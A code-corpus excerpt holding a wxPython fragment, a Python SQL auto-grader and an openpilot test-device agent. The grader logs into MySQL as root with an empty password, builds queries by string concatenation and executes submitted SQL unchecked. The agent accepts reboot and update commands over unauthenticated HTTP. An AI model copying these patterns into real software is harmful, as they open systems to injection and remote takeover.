sizer.Add(self.widgets['lowfilt'], (3,3), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
sbsz.Add(sizer, 0, wx.ALIGN_CENTER|wx.ALL, 2)
return sbsz
|
grader.py
|
#!/usr/bin/python\
import sys
import os
from multiprocessing import Process
import time
import threading
import MySQLdb
moduleNames = [str(sys.argv[3])]
modules = map(__import__, moduleNames)
dct = {}
for x in xrange(4,len(sys.argv),2):
if (sys.argv[x+1] == "''"): sys.argv[x+1] = ""
dct[str(sys.argv[x])] = sys.argv[x+1]
db_kunci = modules[0].connect(**dct)
cursor_kunci = db_kunci.cursor()
def check(submission_id):
try:
db= MySQLdb.connect('localhost', 'root', '', 'sbd')
cursor = db.cursor()
sql = '''select question_id, jawaban from submission where id = '''+str(submission_id)
cursor.execute(sql)
unchecked = cursor.fetchone()
sub_id = submission_id
ques_id = ''
ans = ''
tanda = 0
while unchecked is not None:
ques_id = unchecked[0]
ans = unchecked[1]
unchecked = cursor.fetchone()
ans = ans.replace(';', '')
cursor_kunci.execute(ans)
results = cursor_kunci.fetchall()
num_fields = len(cursor_kunci.description)
hasil=[[0 for x in range(num_fields)] for x in range(10000)]
rows=0
for res in results:
for column in range(num_fields):
hasil[rows][column] = res[column]
rows+=1
kunci = '''select jawaban from question where id='''+ str(ques_id)
cursor.execute(kunci)
temp = cursor.fetchone()
while temp is not None:
temp_kunci = temp[0]
temp_kunci = temp_kunci.replace(';', '')
temp = cursor.fetchone()
cursor_kunci.execute(temp_kunci)
res_kunci = cursor_kunci.fetchall()
num_fields_1 = len(cursor_kunci.description)
arr_kunci=[[0 for x in range(num_fields_1)] for x in range(10000)]
row_kunci=0
for res_key in res_kunci:
for column_kunci in range(num_fields_1):
arr_kunci[row_kunci][column_kunci] = res_key[column_kunci]
row_kunci+=1
flag=0
if (num_fields != num_fields_1):
flag=1
if (rows != row_kunci):
flag=1
if (flag==0):
for row_compare in range(row_kunci):
for column_compare in range(num_fields):
if (hasil[row_compare][column_compare]!=arr_kunci[row_compare][column_compare]):
#print hasil[row_compare][column_compare]
#print arr_kunci[row_compare][column_compare]
flag=1
if (flag==1):
update1 = '''update submission set nilai = 0, status = 1 where id = '''+str(sub_id)
cursor.execute(update1)
db.commit()
print 'query '+str(sub_id)+' failed'
elif (flag==0):
update2 = '''update submission set nilai = 100, status = 1 where id = '''+str(sub_id)
cursor.execute(update2)
db.commit()
print 'query '+str(sub_id)+' success'
#print "keluar"
return
except :
#print str(sub_id)+' Failed : '+ str(e) + ' ' + str(temp_kunci)
print 'except '+str(sub_id)
db.rollback()
update1 = '''update submission set nilai = 0, status = 1 where id = '''+str(sub_id)
cursor.execute(update1)
db.commit()
return
def stopwatch(timeout, target, args):
p = Process(target=target, args=args)
sub_id = args[0]
p.start()
for x in xrange(0,timeout):
time.sleep(1)
#print p.is_alive()
if(p.is_alive() == False):
return
print 'TLE '+str(sub_id)
db.rollback()
updateTLE = '''update submission set nilai = 101, status = 1 where id = '''+str(sub_id)
cursor.execute(updateTLE)
db.commit()
p.terminate()
if __name__ == '__main__':
try:
while True:
db= MySQLdb.connect('localhost', 'root', '', 'sbd')
cursor = db.cursor()
#try:
sql = '''select s.id, s.question_id, s.users_id, s.jawaban, s.status from submission s,event e, listdb ldb, question q where s.question_id = q.id and q.event_id = e.id and e.listdb_id = ldb.id and s.status = 0 and ldb.dbversion_id = '''+sys.argv[2]+''' having s.id = min(s.id)'''
cursor.execute(sql)
unchecked = cursor.fetchone()
sub_id = ''
ques_id = ''
user_id = ''
ans = ''
stat = ''
tanda = 0
while unchecked is not None:
sub_id = unchecked[0]
ques_id = unchecked[1]
user_id = unchecked[2]
ans = unchecked[3]
stat = unchecked[4]
unchecked = cursor.fetchone()
if (sub_id!='') :
tanda = 1
if (tanda==1):
t = threading.Thread(target=stopwatch, args=(20,check,(str(sub_id),)))
t.start()
time.sleep(1)
t.join()
print "next"
#time.sleep(1)
db.close()
db_kunci.close()
except KeyboardInterrupt:
sys.exit(0)
except :
#print str(sub_id)+' Outer Failed : '+ str(e)
print 'berhenti'
|
eon_testing_slave.py
|
#!/usr/bin/env python3
import re
import time
import json
import requests
import subprocess
from common.timeout import Timeout
from http.server import BaseHTTPRequestHandler, HTTPServer
from os.path import expanduser
from threading import Thread
from selfdrive.manager import unblock_stdout
from common.params import Params
import os
if __name__ == "__main__":
unblock_stdout()
MASTER_HOST = "testing.comma.life"
def get_workdir():
continue_sh = open('/data/data/com.termux/files/continue.sh').read()
for l in continue_sh.split('\n'):
if l.startswith('#'):
continue
if 'cd "$HOME/one"' in l:
work_dir = expanduser('~/one')
return work_dir
work_dir = '/data/openpilot'
return work_dir
def heartbeat():
work_dir = get_workdir()
env = {
"LD_LIBRARY_PATH": "",
"ANDROID_DATA": "/data",
"ANDROID_ROOT": "/system",
}
while True:
try:
with open(os.path.join(work_dir, "selfdrive", "common", "version.h")) as _versionf:
version = _versionf.read().split('"')[1]
# subprocess.check_output(["/system/bin/screencap", "-p", "/tmp/screen.png"], cwd=work_dir, env=env)
# screenshot = base64.b64encode(open('/tmp/screen.png').read())
tmux = ""
try:
tmux = os.popen('tail -n 100 /tmp/tmux_out').read()
except:
pass
params = Params()
msg = {
'version': version,
'dongle_id': params.get("DongleId").rstrip().decode('utf8'),
'remote': subprocess.check_output(["git", "config", "--get", "remote.origin.url"], cwd=work_dir).decode('utf8').rstrip(),
'revision': subprocess.check_output(["git", "rev-parse", "HEAD"], cwd=work_dir).decode('utf8').rstrip(),
'serial': subprocess.check_output(["getprop", "ro.boot.serialno"]).decode('utf8').rstrip(),
# 'screenshot': screenshot,
'tmux': tmux,
}
with Timeout(10):
requests.post('http://%s/eon/heartbeat/' % MASTER_HOST, json=msg, timeout=5.0)
except Exception as e:
print("Unable to send heartbeat", e)
time.sleep(5)
class HTTPHandler(BaseHTTPRequestHandler):
def _set_headers(self, response=200, content='text/html'):
self.send_response(response)
self.send_header('Content-type', content)
self.end_headers()
def do_GET(self):
self._set_headers()
self.wfile.write("EON alive")
def do_HEAD(self):
self._set_headers()
def do_POST(self):
# Doesn't do anything with posted data
self._set_headers(response=204)
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
post_data = json.loads(post_data)
if 'command' not in post_data or 'dongle_id' not in post_data:
return
params = Params()
if params.get("DongleId").rstrip() != post_data['dongle_id']:
return
if post_data['command'] == "reboot":
subprocess.check_output(["reboot"])
if post_data['command'] == "update":
print("Pulling new version")
work_dir = get_workdir()
env = {
"GIT_SSH_COMMAND": "ssh -i /data/gitkey",
"LD_LIBRARY_PATH": "/data/data/com.termux/files/usr/lib/",
"ANDROID_DATA": "/data",
"ANDROID_ROOT": "/system",
}
subprocess.check_output(["git", "reset", "--hard"], cwd=work_dir, env=env)
# subprocess.check_output(["git", "clean", "-xdf"], cwd=work_dir, env=env)
try:
subprocess.check_output(["git", "fetch", "--unshallow"], cwd=work_dir, env=env)
except subprocess.CalledProcessError:
pass
if 'revision' in post_data and re.match(r'\b[0-9a-f]{5,40}\b', post_data['revision']):
subprocess.check_output(["git", "fetch", "origin"], cwd=work_dir, env=env)
subprocess.check_output(["git", "checkout", post_data['revision']], cwd=work_dir, env=env)
else:
subprocess.check_output(["git", "pull"], cwd=work_dir, env=env)
subprocess.check_output(["git", "submodule", "update"], cwd=work_dir, env=env)
subprocess.check_output(["git", "lfs", "pull"], cwd=work_dir, env=env)
subprocess.check_output(["reboot"], cwd=work_dir, env=env)
def control_server(server_class=HTTPServer, handler_class=HTTPHandler, port=8080):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
print('Starting httpd...')
httpd.serve_forever()
if __name__ == "__main__":
control_thread = Thread(target=control_server)
control_thread.daemon = True
control_thread.start()
heartbeat()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.